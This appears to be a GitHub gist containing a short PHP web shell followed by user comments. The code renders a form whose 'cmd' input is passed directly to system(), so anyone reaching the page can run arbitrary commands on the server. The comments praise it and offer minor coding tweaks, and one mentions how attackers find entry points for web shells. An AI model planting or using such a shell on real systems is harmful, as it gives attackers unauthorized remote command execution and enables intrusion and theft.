| <html> | |
| <body> | |
| <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> | |
| <input type="TEXT" name="cmd" id="cmd" size="80"> | |
| <input type="SUBMIT" value="Execute"> | |
| </form> | |
| <pre> | |
| <?php | |
| if(isset($_GET['cmd'])) | |
| { | |
| system($_GET['cmd']); | |
| } | |
| ?> | |
| </pre> | |
| </body> | |
| <script>document.getElementById("cmd").focus();</script> | |
| </html> |
This comment has been minimized.
This comment has been minimized.
|
It's better to have the isset function before accessing the global variable |
This comment has been minimized.
This comment has been minimized.
|
This comment has been minimized.
This comment has been minimized.
|
Nice and simple |
This comment has been minimized.
This comment has been minimized.
|
That's actually helpful. Thanks |
This comment has been minimized.
This comment has been minimized.
|
You can use the autofocus attribute to avoid the script and then it'll still autofocus in browsers with scripts blocked. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
However, there are a number of potential entry points, from coding error in the web application to configuration issues in either the web server or PHP, and you need only one single exploitable vulnerability to be successful. once can have a good overview on web shells with examples here https://secure.wphackedhelp.com/blog/web-shell-php-exploit/